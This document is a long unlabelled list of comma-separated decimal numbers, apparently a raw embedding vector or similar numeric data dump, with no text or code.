0.024451205506920815, 0.003799757920205593, -0.0038573299534618855, -0.007091526873409748, -0.0004817429289687425, 0.013715703971683979, 0.0023265897762030363, -0.0026042903773486614, 0.007646928075700998, -0.017650924623012543, -0.02583293616771698, -0.004405958112329245, -0.01055939868092537, 0.007003475446254015, 0.01683814264833927, -0.005547240376472473, -0.012218829244375229, -0.0007454738952219486, -0.013559920713305473, 0.007084753829985857, -0.01400695089250803, -0.004263721406459808, 0.006729161366820335, -0.033622100949287415, 0.007870443165302277, 0.014819732867181301, -0.0010769367218017578, 0.004873307887464762, 0.009590832516551018, -0.013173848390579224, 0.006465007085353136, 0.002748220693320036, 0.0032358900643885136, 0.012645539827644825, -0.005648837890475988, -0.017691563814878464, 0.00428065424785018, -0.01720389537513256, -0.029991671442985535, -0.019506778568029404, 0.018504347652196884, 0.001407129573635757, 0.007057660724967718, 0.008717091754078865, -0.008439390920102596, -0.007233763579279184, -0.001305531826801598, -0.010931923985481262, -0.018016677349805832, -0.027851345017552376, 0.012713272124528885, -0.012069819495081902, -0.006925583817064762, -0.03969087451696396, 0.03373046964406967, 0.04825218394398689, 0.006705455016344786, -0.005747049115598202, 0.01366829127073288, -0.008358112536370754, 0.0038979691453278065, -0.0011810745345428586, -0.02361132949590683, -0.013566693291068077, -0.06160891056060791, 0.002754993736743927, -0.011155438609421253, 0.024369927123188972, 0.008324246853590012, 0.007220217492431402, -0.01051198597997427, 0.0016170984599739313, -0.0020709019154310226, -0.05597361922264099, 0.020644674077630043, -0.03042515553534031, -0.0037963713984936476, 0.011656654998660088, 0.023394588381052017, 0.028907962143421173, 0.015361588448286057, -0.005330498330295086, 0.03278222680091858, -0.0033832069020718336, 0.005682704038918018, 0.002274097641929984, 0.0010896364692598581, -0.013587012887001038, 0.012808096595108509, 0.002771926810964942, -0.0061568268574774265, -0.0009914252441376448, -0.015578330494463444, -0.02061758190393448, -0.005716569721698761, -0.011792118661105633, -0.0045651281252503395, -0.033622100949287415, -0.00630922382697463, 0.007287949323654175, -0.00283288536593318, -0.016540123149752617, -0.0015586796216666698, 0.035112202167510986, -0.0014757080934941769, -0.025900667533278465, -0.010423935018479824, 0.012225602753460407, -0.02474922500550747, 0.0017830415163189173, -0.005062957294285297, 0.015835711732506752, -0.0007865363149903715, 0.008595174178481102, 0.013912126421928406, 0.021091705188155174, 0.008568082004785538, 0.01053230557590723, 0.029585281386971474, 0.021592920646071434, 0.013106117025017738, -0.007301495410501957, -0.03110247477889061, -0.010925150476396084, 0.050961460918188095, -0.0016357246786355972, -0.0036676807794719934, 0.000023653239622944966, 0.01511775329709053, -0.006458234041929245, -0.010660996660590172, -0.006102641578763723, 0.007348908111453056, 0.007762072142213583, 0.015239670872688293, -0.005977337714284658, 0.0074437325820326805, -0.006502259522676468, -0.026279965415596962, -0.010945470072329044, 0.004568514879792929, 0.00177965487819165, 0.001903265598230064, 0.020129911601543427, -0.015022928826510906, 0.02787843719124794, -0.005923151969909668, 0.001974384067580104, 0.003362887306138873, 0.010667769238352776, -0.00425694789737463, 0.0011497484520077705, -0.003120745997875929, -0.019913170486688614, 0.005794461350888014, 0.005621745251119137, -0.00037929846439510584, -0.012692952528595924, 0.023367494344711304, -0.02405836060643196, -0.02420737035572529, 0.019682882353663445, 0.016242101788520813, 0.010451027192175388, 0.015469959005713463, 0.010654223151504993, 0.0019709973130375147, -0.015862803906202316, -0.010112368501722813, -0.022988196462392807, -0.018558531999588013, -0.01337027084082365, -0.005445642396807671, -0.019141025841236115, -0.03188816457986832, 0.023123661056160927, 0.008324246853590012, 0.005005385261029005, -0.00483605545014143, -0.016309835016727448, -0.0017153095686808228, 0.0004995225463062525, -0.016553668305277824, 0.0251962561160326, 0.009380863979458809, -0.017556101083755493, 0.029829116538167, 0.01743418350815773, 0.022785000503063202, 0.01683814264833927, 0.018463708460330963, 0.02497951313853264, 0.01979125291109085, -0.00342215271666646, 0.009970131330192089, 0.0149145582690835, 0.01085064560174942, 0.00000210669918487838, 0.010660996660590172, 0.008771277032792568, -0.01843661442399025, -0.012212056666612625, -0.00944182276725769, -0.020495664328336716, -0.017691563814878464, 0.024640854448080063, -0.005889286287128925, 0.010274924337863922, 0.00012096488353563473, 0.027214664965867996, -0.003056400688365102, 0.015646062791347504, 0.00770788686349988, 0.017136164009571075, -0.006329543422907591, 0.003462791908532381, 0.013553147204220295, 0.007985587231814861, 0.011114800348877907, -0.006969609297811985, -0.0037692785263061523, 0.004036819562315941, -0.010708408430218697, -0.03310733661055565, 0.004128257278352976, -0.00996335782110691, -0.006962836254388094, -0.015266763977706432, -0.009726296178996563, -0.018138594925403595, -0.011839531362056732, -0.011473778635263443, 0.01108093373477459, -0.01716325618326664, 0.005723343230783939, 0.005245833192020655, -0.009949811734259129, 0.00037908682134002447, 0.005753822159022093, 0.003415379673242569, -0.010288471356034279, 0.0064379144459962845, -0.001692450139671564, -0.011575376614928246, -0.0023384427186101675, -0.009556966833770275, 0.004680272191762924, 0.00967211090028286, 0.0053575909696519375, 0.004514329135417938, 0.002883684355765581, -0.004717524629086256, -0.00028489719261415303, -0.01897847093641758, 0.01450816635042429, 0.001305531826801598, 0.001651810947805643, -0.014291424304246902, 0.01484682597219944, -0.004494009539484978, -0.005388070363551378, -0.009807574562728405, -0.006058615632355213, -0.010105594992637634, 0.020780138671398163, -0.011026748456060886, -0.005079890135675669, 0.01712261699140072, 0.01223914884030819, -0.005916378926485777, -0.012164643965661526, -0.0020556622184813023, 0.012184963561594486, -0.007491144817322493, -0.005855420138686895, -0.0006735087954439223, -0.009021884761750698, -0.008378432132303715, -0.006045069545507431, -0.007802711334079504, 0.015862803906202316, 0.001255579525604844, -0.016594307497143745, -0.004080845043063164, -0.011250264011323452, -0.015429319813847542, 0.02583293616771698, 0.007897536270320415, 0.012130778282880783, -0.00973984319716692, -0.008717091754078865, 0.009238626807928085, 0.0052322871051728725, -0.006719001568853855, -0.004527875687927008, -0.009387637488543987, 0.005476121790707111, -0.0007696033571846783, 0.004195989575237036, 0.013749569654464722, 0.013966311700642109, -0.006620790343731642, 0.016445297747850418, -0.02706565521657467, 0.03064189851284027, 0.00047115981578826904, 0.017772842198610306, -0.004578674212098122, 0.023963535204529762, 0.007376000750809908, 0.01679750345647335, -0.01635047420859337, -0.01421014592051506, -0.008215876296162605, 0.018856553360819817, 0.021091705188155174, -0.0025619580410420895, -0.0176644716411829, 0.02193157933652401, -0.01343800313770771, 0.004998612217605114, 0.01924939826130867, 0.009286039508879185, 0.022906918078660965, -0.010708408430218697, 0.007653701119124889, -0.03581661358475685, -0.005740276072174311, -0.019411953166127205, 0.004175669979304075, 0.03484127297997475, 0.009048977866768837, -0.007186351343989372, -0.01545641291886568, -0.021918032318353653, -0.008026226423680782, 0.00456174137070775, 0.005638678092509508, -0.009204761125147343, -0.0034949644468724728, 0.004074071999639273, 0.009753389284014702, 0.014860372059047222, -0.00566577073186636, 0.018450161442160606, 0.020306015387177467, -0.0055709462612867355, -0.005669157486408949, -0.008236194960772991, 0.006139894016087055, 0.01652657613158226, -0.028799591585993767, 0.00597056420519948, -0.00034606753615662456, 0.004819122608751059, -0.004416117910295725, 0.0043111336417496204, 0.0013199248351156712, -0.00976016279309988, 0.025683924555778503, -0.01318739540874958, -0.011250264011323452, -0.007287949323654175, -0.00971952360123396, -0.001625564880669117, -0.0028684446588158607, 0.0023723088670521975, 0.015104207210242748, -0.002560264663770795, 0.014399795792996883, 0.01137218065559864, 0.0018287604907527566, 0.0014553886139765382, -0.015957629308104515, 0.029991671442985535, 0.010681316256523132, -0.014467527158558369, 0.007809484843164682, -0.008635813370347023, -0.029368538409471512, 0.01643175259232521, -0.02442411333322525, -0.014101775363087654, 0.015727341175079346, 0.020238282158970833, 0.013573466800153255, 0.0011074161157011986, 0.005923151969909668, 0.00971952360123396, 0.006485326681286097, -0.013424457050859928, 0.008452937006950378, 0.005374523811042309, 0.0068239858373999596, 0.010735501535236835, 0.01135186105966568, 0.018368883058428764, -0.012496530078351498, -0.01662140153348446, -0.024139638990163803, 0.008696772158145905, -0.01784057542681694, 0.0007679100963287055, 0.004324679728597403, 0.00915057584643364, 0.01957450993359089, -0.0022182187531143427, -0.009848213754594326, 0.000688325148075819, -0.0077823917381465435, 0.002900617429986596, -0.0023892417084425688, 0.017637379467487335, -0.011704066768288612, 0.0091708954423666, -0.003918288741260767, 0.019601603969931602, 0.01477909367531538, -0.01747482270002365, -0.046464063227176666, -0.003759118728339672, -0.004988452419638634, -0.0028802978340536356, 0.0028159525245428085, -0.006536125671118498, -0.0013190781464800239, -0.01314675621688366, 0.019682882353663445, -0.019357768818736076, 0.016472389921545982, -0.003782824845984578, 0.016675585880875587, -0.004107938148081303, -0.0008419918012805283, 0.012767457403242588, -0.028311921283602715, 0.02266308292746544, 0.006779960356652737, 0.005713183432817459, 0.0022791775409132242, -0.004405958112329245, 0.0006117034354247153, -0.005506601184606552, -0.007186351343989372, -0.005740276072174311, 0.033486638218164444, -0.006183919962495565, 0.010268151760101318, -0.006431140936911106, -0.024437658488750458, -0.005543853621929884, -0.003535603638738394, -0.013580240309238434, -0.014711362309753895, 0.012225602753460407, 0.0058181677013635635, -0.0010710102505981922, 0.01911393366754055, -0.000017078486052923836, 0.003403526498004794, 0.011324768885970116, -0.01461653783917427, -0.023137206211686134, -0.004341613035649061, 0.018544986844062805, -0.004223082214593887, -0.012408478185534477, 0.004734457936137915, -0.012151097878813744, 0.015063568018376827, 0.0010769367218017578, 0.013065477833151817, -0.004429664462804794, -0.005642064847052097, 0.005692863836884499, -0.0036202685441821814, -0.014101775363087654, 0.0006730854511260986, 0.005377910565584898, -0.011805664747953415, -0.0006942516774870455, -0.0018778661033138633, 0.0017356291646137834, -0.02069886028766632, 0.0036304283421486616, 0.013654745183885098, 0.009868533350527287, 0.0034915779251605272, 0.02079368382692337, -0.017854120582342148, -0.0027143547777086496, -0.008093958720564842, 0.014657177031040192, 0.0030123749747872353, -0.016187917441129684, 0.0025094659067690372, 0.019642243161797523, -0.0024332674220204353, -0.007274402771145105, -0.018368883058428764, 0.008893194608390331, -0.029937487095594406, -0.014088229276239872, 0.012212056666612625, 0.01089805830270052, 0.020861415192484856, -0.009496008045971394, -0.008026226423680782, -0.0018998789601027966, -0.01141959335654974, -0.006779960356652737, 0.0018473867094144225, 0.027214664965867996, -0.015469959005713463, -0.016919421032071114, 0.010186873376369476, -0.02125426009297371, 0.028339015319943428, 0.0033967532217502594, 0.013620879501104355, -0.0038810360711067915, -0.008358112536370754, -0.012909694574773312, -0.016607854515314102, 0.016079546883702278, -0.016079546883702278, -0.0010261378483846784, 0.0010066649410873652, 0.012889374978840351, 0.0039386083371937275, -0.01255748886615038, 0.003071640385314822, 0.01847725361585617, 0.006045069545507431, -0.021985765546560287, 0.026225781068205833, -0.006048455834388733, 0.000505449075717479, -0.0016662039561197162, -0.02525044046342373, -0.0012894454412162304, -0.000014564998309651855, 0.014359156601130962, 0.004693818744271994, 0.006431140936911106, 0.029666559770703316, 0.00715248566120863, -0.024857595562934875, 0.0026550893671810627, 0.01400695089250803, 0.009143802337348461, -0.019330676645040512, 0.014250785112380981, -0.016648493707180023, 0.009577286429703236, 0.01725807972252369, -0.012381386011838913, 0.0033595007844269276, -0.027932623401284218, -0.002064128639176488, -0.0063227699138224125, -0.010132688097655773, -0.017176803201436996, 0.00948923546820879, -0.034976739436388016, -0.004355159122496843, 0.007843350991606712, 0.005496441386640072, 0.009238626807928085, 0.014901011250913143, 0.006465007085353136, -0.0009956584544852376, -0.020780138671398163, 0.01368861086666584, -0.013045158237218857, -0.018775274977087975, -0.012435571290552616, -0.008791596628725529, -0.002817645901814103, -0.0175696462392807, -0.00992271862924099, -0.00908284354954958, -0.030045857653021812, -0.006227945443242788, 0.002294417005032301, 0.0068544652312994, -0.008276834152638912, -0.018084408715367317, 0.009597606025636196, -0.025914212688803673, -0.020874962210655212, 0.025006607174873352, -0.011920808814466, -0.01339736394584179, -0.03156305104494095, 0.013993404805660248, -0.0010616970248520374, 0.010376522317528725, 0.001450308714993298, -0.0206582210958004, 0.005919765681028366, -0.013444776646792889, -0.008500349707901478, -0.009936265647411346, 0.02266308292746544, -0.009238626807928085, -0.017908306792378426, -0.02264953777194023, -0.0153480414301157, -0.010417161509394646, 0.005940084811300039, 0.005879126489162445, 0.01847725361585617, -0.026361243799328804, -0.012503303587436676, -0.00019906820671167225, 0.0056048124097287655, 0.03592498227953911, -0.009130256250500679, -0.012713272124528885, 0.03050643391907215, -0.0003763351996894926, 0.01807086355984211, 0.008256514556705952, -0.0008847475401125848, -0.0023384427186101675, -0.002859978238120675, 0.022405702620744705, 0.003623655065894127, 0.0028294988442212343, -0.007755299098789692, -0.012720045633614063, -0.03232164680957794, 0.00976016279309988, -0.01770511083304882, 0.008947379887104034, 0.008209102787077427, -0.015158392488956451, 0.01702779158949852, 0.010904830880463123, -0.012950333766639233, 0.01309934351593256, -0.013729250058531761, 0.00659369770437479, 0.01739354431629181, -0.010403615422546864, 0.020319560542702675, 0.021484550088644028, -0.007917855866253376, 0.0022351518273353577, 0.027268851175904274, 0.0010887897806242108, -0.02152518928050995, -0.0029226301703602076, -0.019411953166127205, 0.014142414554953575, -0.00994303822517395, 0.01236783992499113, -0.02525044046342373, -0.005066344048827887, 0.0007179578533396125, -0.008486803621053696, -0.009407957084476948, 0.017000699415802956, 0.0038979691453278065, -0.011514417827129364, -0.011013202369213104, -0.009035431779921055, -0.004138417076319456, 0.0016535043250769377, 0.0008991406066343188, 0.016336927190423012, 0.007274402771145105, -0.021538734436035156, -0.0032003307715058327, 0.013018065132200718, -0.01693296805024147, 0.01774575002491474, -0.005706409923732281, -0.006045069545507431, -0.03015422821044922, -0.009997224435210228, 0.018775274977087975, -0.02401772141456604, -0.001507034059613943, -0.034028492867946625, 0.021714838221669197, 0.014982289634644985, 0.0025619580410420895, -0.01729871891438961, -0.022676629945635796, -0.009069297462701797, -0.0059434715658426285, -0.002741447417065501, 0.004764936864376068, 0.0005664077471010387, 0.030181322246789932, 0.014332063496112823, 0.012537169270217419, -0.004009726922959089, -0.005046024452894926, -0.012449117377400398, 0.02129489928483963, 0.00715248566120863, 0.00990239903330803, 0.004815735854208469, -0.02782425284385681, -0.002890457632020116, 0.022419249638915062, -0.012049499899148941, 0.002114927629008889, -0.003593175671994686, -0.0038742630276829004, 0.0007988127181306481, 0.015212577767670155, -0.0035423769149929285, 0.005706409923732281, -0.015483505092561245, 0.01108093373477459, 0.002274097641929984, 0.029205981642007828, 0.029531095176935196, 0.00971275009214878, -0.003467871807515621, -0.013072251342236996, -0.019818345084786415, -0.00969243049621582, 0.01173793338239193, -0.006458234041929245, 0.017081977799534798, -0.015524144284427166, 0.0014426888665184379, 0.005255992989987135, -0.011135119013488293, 0.0057775285094976425, 0.012604900635778904, 0.003007295075803995, -0.01639111340045929, 0.0017457889625802636, -0.023448772728443146, -0.003671067301183939, -0.034489069133996964, -0.012523623183369637, -0.003823464037850499, 0.004632859956473112, -0.01816568709909916, -0.008967699483036995, -0.010146234184503555, -0.006038296036422253, 0.01621500961482525, 0.001979463966563344, -0.02860994264483452, -0.0005943471333011985, -0.014481074176728725, -0.00717280525714159, -0.0018575465073809028, -0.009069297462701797, 0.02370615489780903, 0.018680449575185776, 0.005039250943809748, -0.005360977724194527, 0.008737411350011826, -0.00881191622465849, 0.0205633956938982, 0.005056184250861406, -0.018328243866562843, -0.006319383624941111, 0.018057316541671753, -0.010064955800771713, 0.017515461891889572, -0.01393921859562397, -0.006332929711788893, 0.0012699725339189172, 0.0022605510894209146, -0.008791596628725529, 0.002865058137103915, -0.02025182917714119, 0.0032308101654052734, 0.006234718486666679, 0.008127824403345585, -0.007633381988853216, -0.024871142581105232, -0.007084753829985857, 0.0091708954423666, -0.0067833466455340385, -0.014061136171221733, -0.00512052932754159, -0.001772881718352437, 0.008439390920102596, 0.008053319528698921, -0.029449816793203354, 0.01947968639433384, -0.0222025066614151, 0.015686701983213425, 0.00454142177477479, -0.007213443983346224, -0.015226124785840511, 0.00717280525714159, 0.00770788686349988, 0.02029246836900711, 0.004521102178841829, -0.01934422180056572, 0.016878781840205193, 0.012543942779302597, 0.0017373224254697561, 0.003205410670489073, -0.008696772158145905, -0.016919421032071114, 0.021958671510219574, 0.0016611241735517979, 0.013553147204220295, -0.002375695388764143, 0.011853077448904514, 0.02473567984998226, -0.0050290911458432674, 0.014155960641801357, -0.032619670033454895, -0.015767978504300117, -0.004910560790449381, -0.0010388375958427787, -0.03232164680957794, 0.013532827608287334, 0.00797204114496708, -0.011907262727618217, 0.009326678700745106, 0.017827028408646584, -0.014589444734156132, 0.007450505625456572, -0.0007674867520108819, 0.01857207901775837, -0.009218307211995125, 0.0009313132031820714, 0.023665515705943108, -0.016011813655495644, 0.009265719912946224, -0.01820632629096508, 0.02447829768061638, 0.0024806796573102474, -0.027133386582136154, -0.025440091267228127, -0.004182443022727966, 0.005479508079588413, -0.022459888830780983, 0.00710507296025753, 0.006241491995751858, -0.016960060223937035, 0.02111879736185074, -0.00546934874728322, -0.010017544031143188, -0.009631471708416939, 0.012273014523088932, 0.005963791161775589, 0.025507822632789612, -0.028582848608493805, -0.02573811076581478, -0.013356724753975868, 0.003989407327026129, 0.027350129559636116, -0.004195989575237036, -0.008446164429187775, -0.008412298746407032, -0.0019472913118079305, -0.009875306859612465, 0.0037963713984936476, -0.005340658128261566, -0.0018863326404243708, -0.024275101721286774, -0.007667247671633959, -0.009861760772764683, -0.012401705607771873, 0.0005498981336131692, 0.0008771276916377246, -0.012930014170706272, -0.0019693041685968637, -0.005188261158764362, -0.012747137807309628, 0.009455368854105473, 0.007098299916833639, -0.012293334119021893, 0.011616015806794167, -0.0175696462392807, 0.030994104221463203, 0.023448772728443146, 0.0013851167168468237, 0.019317129626870155, 0.022256692871451378, 0.0001056193868862465, 0.01992671564221382, -0.03681904450058937, -0.01830115169286728, 0.006136507261544466, 0.01223914884030819, -0.01575443334877491, -0.000015530706150457263, -0.005300018936395645, 0.008127824403345585, 0.007613062392920256, 0.018084408715367317, 0.01457589864730835, 0.027228211984038353, -0.011812438257038593, 0.0014172893716022372, -0.055052462965250015, -0.003505124244838953, 0.008568082004785538, -0.009854987263679504, -0.0023689221125096083, -0.0006396428216248751, -0.007680794224143028, -0.016418205574154854, -0.005933311767876148, -0.003806531196460128, -0.0054896678775548935, 0.01911393366754055, 0.0019523712107911706, 0.007646928075700998, 0.0045651281252503395, 0.008866101503372192, 0.0007763765752315521, 0.009292813017964363, -0.021999310702085495, -0.004355159122496843, 0.015497052110731602, -0.0009584059589542449, 0.005306791979819536, -0.02896214835345745, 0.003113972721621394, 0.0005981570575386286, 0.009705976583063602, 0.0284744780510664, -0.0033967532217502594, 0.003173238132148981, -0.0035897891502827406, 0.0014884078409522772, 0.00036215383443050086, -0.014887465164065361, -0.005560786463320255, 0.00543548259884119, -0.010478120297193527, 0.007328588515520096, 0.007470825221389532, 0.006058615632355213, 0.002777006709948182, -0.012428797781467438, -0.011358634568750858, -0.0169871523976326, 0.010274924337863922, -0.01866690255701542, 0.021484550088644028, 0.00007175344944698736, -0.020576942712068558, 0.02106461115181446, -0.022988196462392807, 0.008127824403345585, -0.004179056268185377, -0.003452632110565901, 0.010721955448389053, -0.0019252784550189972, -0.01080323290079832, -0.00600443035364151, 0.012428797781467438, 0.0091234827414155, -0.020360199734568596, 0.004720911383628845, -0.0006569991237483919, 0.005909605883061886, 0.006756254006177187, 0.005598038900643587, 0.0193035826086998, 0.01635047420859337, 0.026401882991194725, -0.00017028216097969562, 0.00892028771340847, 0.02755332551896572, 0.016323380172252655, -0.0006345629808492959, 0.01621500961482525, -0.005784301552921534, -0.0061500538140535355, 0.013207715004682541, -0.00887287501245737, -0.008689998649060726, 0.001957450993359089, 0.017962491139769554, 0.015903443098068237, 0.021728383377194405, 0.0053237248212099075, -0.03283641114830971, 0.004179056268185377, -0.004717524629086256, 0.014494620263576508, -0.008222648873925209, 0.006495486479252577, 0.002238538349047303, -0.022012857720255852, -0.010776140727102757, 0.0034306191373616457, -0.008669679053127766, 0.006122961174696684, -0.02334040217101574, 0.013024838641285896, 0.0026618624106049538, -0.009726296178996563, -0.00033738938509486616, -0.011507644318044186, 0.030398063361644745, 0.005547240376472473, -0.010701635852456093, -0.01223914884030819, -0.006390501745045185, 0.018409522250294685, -0.016513029113411903, -0.00028278055833652616, 0.02075304463505745, 0.020725952461361885, 0.0030868800822645426, 0.021782569587230682, -0.004626086913049221, -0.014535259455442429, 0.003999567124992609, 0.012564262375235558, -0.041208069771528244, -0.006891717668622732, -0.003647361183539033, 0.01843661442399025, -0.0009626392275094986, 0.012930014170706272, -0.0014198293210938573, -0.003674454055726528, -0.007301495410501957, -0.01830115169286728, -0.0071186195127666, -0.017501914873719215, 0.026781180873513222, 0.0028108726255595684, 0.006285517476499081, -0.01720389537513256, -0.005381297320127487, -0.003068253630772233, -0.002470519859343767, 0.002470519859343767, 0.014562352560460567, 0.00030818002414889634, -0.010186873376369476, 0.002050582319498062, -0.011575376614928246, 0.0251962561160326, -0.0251014307141304, 0.003552536480128765, 0.016309835016727448, -0.014047590084373951, -0.02021118998527527, -0.019222304224967957, -0.0023553757928311825, -0.00017398623458575457, 0.02542654424905777, -0.009726296178996563, -0.022906918078660965, 0.0006506492500193417, -0.004304360132664442, 0.012516849674284458, 0.008717091754078865, 0.0032900755759328604, 0.02469504065811634, 0.012625220231711864, -0.00543548259884119, -0.015199031680822372, 0.017325812950730324, -0.016025360673666, -0.022039949893951416, -0.002494226209819317, 0.002819339046254754, 0.02088850922882557, 0.014386249706149101, 0.015646062791347504, -0.02125426009297371, -0.004124870989471674, 0.011412819847464561, -0.01606599986553192, 0.011094480752944946, -0.01720389537513256, 0.007931401953101158, 0.014901011250913143, -0.007342134602367878, 0.0007044114754535258, 0.02301528863608837, 0.00915057584643364, -0.022446341812610626, 0.013492188416421413, -0.002511159051209688, 0.007999134249985218, 0.012022406794130802, -0.004653179552406073, 0.05835777893662453, -0.009204761125147343, -0.009814348071813583, -0.03519348055124283, -0.03386593610048294, -0.003999567124992609, -0.007125392556190491, 0.007274402771145105, -0.00398602057248354, -0.00881191622465849, -0.004554968327283859, 0.000589690578635782, -0.006505646277219057, 0.004578674212098122, -0.01743418350815773, -0.0015298936050385237, -0.0033019287511706352, -0.006664815824478865, -0.011196077801287174, 0.005218740552663803, -0.009042204357683659, 0.0050697303377091885, -0.03641265258193016, -0.020576942712068558, -0.013864713720977306, -0.009258946403861046, 0.004930880386382341, -0.019872531294822693, 0.0021437136456370354, -0.004243401810526848, 0.01901910826563835, -0.011792118661105633, -0.02405836060643196, -0.031075382605195045, 0.029666559770703316, -0.009543420746922493, 0.004209535662084818, -0.007606288883835077, 0.006305837072432041, 0.013485414907336235, 0.019452592357993126, 0.010755821131169796, -0.0036812270991504192, -0.0012327200965955853, -0.019547417759895325, -0.005408389959484339, -0.006353249307721853, 0.0068984911777079105, 0.018829459324479103, -0.001376650296151638, -0.006031522992998362, -0.0005638677976094186, -0.008764504455029964, 0.010572944767773151, 0.01051198597997427, 0.005784301552921534, 0.003965700976550579, 0.008662906475365162, -0.003799757920205593, 0.002038729377090931, 0.009888852946460247, -0.007193124853074551, -0.006434527691453695, -0.014643630012869835, 0.018423069268465042, -0.02002154104411602, -0.008656132966279984, -0.010159780271351337, 0.0017982812132686377, 0.016038907691836357, 0.02814936451613903, -0.007877216674387455, -0.018734635785222054, 0.010464574210345745, 0.004094391595572233, 0.004961359314620495, 0.0017407090635970235, 0.023868711665272713, 0.0016145585104823112, 0.013749569654464722, 0.0011514418292790651, -0.006339703220874071, 0.009245400317013264, -0.021592920646071434, 0.004195989575237036, -0.008696772158145905, 0.013553147204220295, 0.0058181677013635635, 0.01430497132241726, 0.015524144284427166, 0.0142372390255332, -0.010837099514901638, -0.0030293078161776066, 0.004998612217605114, 0.013966311700642109, -0.009543420746922493, 0.014426887966692448, -0.024640854448080063, 0.0032223437447100878, 0.00283796526491642, 0.0008999872370623052, 0.010288471356034279, 0.012435571290552616, 0.023218484595417976, -0.015090661123394966, -0.009570512920618057, 0.0046972050331532955, -0.0037184797693043947, -0.010166553780436516, 0.01164988148957491, 0.005526920780539513, -0.010979335755109787, 0.005113756284117699, 0.015402227640151978, -0.026754088699817657, 0.007315041963011026, -0.0011124960146844387, -0.03337826579809189, 0.003958927933126688, -0.013363498263061047, -0.026252873241901398, -0.006461620330810547, 0.01979125291109085, -0.006712228525429964, -0.00003989830656792037, -0.010159780271351337, -0.024139638990163803, -0.01454880554229021, 0.004832669161260128, -0.01975061371922493, 0.01257780846208334, -0.012462664395570755, -0.00971275009214878, 0.019953809678554535, -0.008608720265328884, -0.007592742796987295, 0.011825984343886375, -0.013749569654464722, 0.0003998297033831477, 0.003958927933126688, -0.03795694187283516, -0.019913170486688614, 0.007091526873409748, -0.016472389921545982, -0.008933833800256252, -0.004514329135417938, 0.017854120582342148, 0.008202329277992249, 0.0069492897018790245, 0.006895104423165321, -0.01811150275170803, -0.01943904720246792, 0.0028633647598326206, 0.0063227699138224125, -0.009841441176831722, 0.004703978542238474, -0.01083032600581646, -0.00040533291758038104, 0.005838487297296524, 0.0007751066004857421, 0.010302017442882061, 0.010098821483552456, -0.0026550893671810627, -0.015442866832017899, 0.0025484117213636637, -0.000772566650994122, 0.0022419248707592487, 0.00430097384378314, -0.01055939868092537, 0.016553668305277824, -0.026862459257245064, -0.004714138340204954, 0.022188961505889893, 0.005750435870140791, -0.02760750986635685, -0.010234285145998001, 0.011358634568750858, 0.019235851243138313, -0.0114399129524827, -0.010423935018479824, -0.004419504664838314, -0.001255579525604844, -0.025087885558605194, -0.005428709555417299, -0.01454880554229021, -0.002499306108802557, -0.012394932098686695, 0.015767978504300117, -0.02874540537595749, -0.0001611806801520288, -0.00835133995860815, 0.006021363195031881, -0.005283086095005274, 0.0012564262142404914, 0.001820294070057571, 0.0071186195127666, -0.004189216066151857, -0.020807230845093727, -0.01055939868092537, -0.010430707596242428, 0.005059570539742708, -0.0065699913538992405, 0.008927060291171074, 0.0002939986588899046, -0.009523101150989532, -0.009279265999794006, -0.027323037385940552, -0.00023621489526703954, -0.0037184797693043947, 0.025954851880669594, -0.010762594640254974, 0.015835711732506752, 0.027458500117063522, -0.004094391595572233, 0.007762072142213583, 0.012774230912327766, 0.008927060291171074, 0.0070305680856108665, -0.018626265227794647, -0.01579507254064083, -0.03129212558269501, -0.024369927123188972, 0.02473567984998226, -0.010959016159176826, 0.005394843406975269, 0.009753389284014702, 0.0018863326404243708, -0.012930014170706272, -0.004013113211840391, -0.004331453237682581, 0.0033374878112226725, 0.007477598264813423, 0.004615927115082741, -0.023936443030834198, -0.0030818001832813025, -0.00398602057248354, -0.034434881061315536, -0.019628696143627167, 0.026903098449110985, 0.018504347652196884, 0.02206704393029213, 0.024315740913152695, 0.009340224787592888, 0.020915601402521133, -0.001844000187702477, 0.020807230845093727, 0.005327111575752497, 0.0043585458770394325, -0.001540053403005004, 0.03890518471598625, 0.003393366700038314, 0.012571034952998161, 0.014426887966692448, -0.011771799065172672, -0.002209752332419157, -0.0016433445271104574, 0.01652657613158226, 0.013614105992019176, -0.007355681154876947, -0.00769434031099081, 0.0006485326448455453, -0.0016323380405083299, 0.014941650442779064, 0.003061480587348342, 0.006414208095520735, -0.020725952461361885, -0.013200941495597363, 0.0033662740606814623, 0.039067741483449936, 0.011771799065172672, 0.006048455834388733, 0.003894582623615861, 0.0025619580410420895, 0.005113756284117699, -0.026496708393096924, 0.013309312053024769, 0.019628696143627167, -0.010701635852456093, -0.0007793398108333349, 0.0033544208854436874, 0.006153440568596125, -0.004852988291531801, 0.007558876648545265, -0.00946891587227583, -0.00021187376114539802, -0.02374679408967495, -0.015104207210242748, -0.007315041963011026, 0.009306359104812145, -0.00831070076674223, 0.007342134602367878, 0.004206149373203516, -0.0020607421174645424, 0.010478120297193527, -0.009184441529214382, 0.003586402628570795, 0.012814870104193687, -0.0023841618094593287, -0.011927582323551178, 0.0018270672298967838, -0.02642897516489029, -0.017244534566998482, 0.022622445598244667, -0.008148143999278545, -0.0018829460022971034, 0.0008115124655887485, -0.015646062791347504, -0.008385205641388893, -0.032944779843091965, -0.008398751728236675, -0.0002906120498664677, 0.009462142363190651, 0.0045583550818264484, -0.0018524666083976626, -0.016946513205766678, 0.007044114638119936, -0.010092048905789852, -0.006177146453410387, -0.00004384051135275513, -0.0009245400433428586, -0.009746615774929523, 0.016364019364118576, 0.020360199734568596, -0.014372702687978745, -0.005892672576010227, -0.027715880423784256, 0.0063227699138224125, -0.002707581501454115, 0.021403271704912186, -0.022351516410708427, -0.006580151151865721, 0.004453370347619057, 0.0011624481994658709, -0.014169507659971714, -0.001796587835997343, -0.004500782582908869, -0.0013351645320653915, 0.005496441386640072, -0.0012259468203410506, 0.0012073206016793847, -0.0034136862959712744, -0.021755477413535118, 0.02120007574558258, 0.001962530892342329, -0.0009499394800513983, -0.010965789668262005, -0.006820599548518658, 0.0013377044815570116, -0.00860194768756628, 0.009536647237837315, 0.017542554065585136, 0.0028481250628829002, 0.012002087198197842, -0.0030547073110938072, -0.011378954164683819, -0.0053982301615178585, -0.0021064612083137035, -0.0014850212028250098, 0.015686701983213425, 0.0061906930059194565, -0.04139772057533264, 0.0004897860926575959, -0.001336011104285717, -0.01030879095196724, -0.006756254006177187, 0.0027211278211325407, 0.014765547588467598, 0.013194167986512184, 0.0003208797425031662, 0.026577986776828766, -0.018544986844062805, -0.020671766251325607, -0.014833279885351658, 0.00021515451953746378, 0.013600559905171394, 0.004934266675263643, 0.01034943014383316, 0.006719001568853855, -0.007511464413255453, -0.0017661085585132241, -0.007125392556190491, 0.00200824998319149, 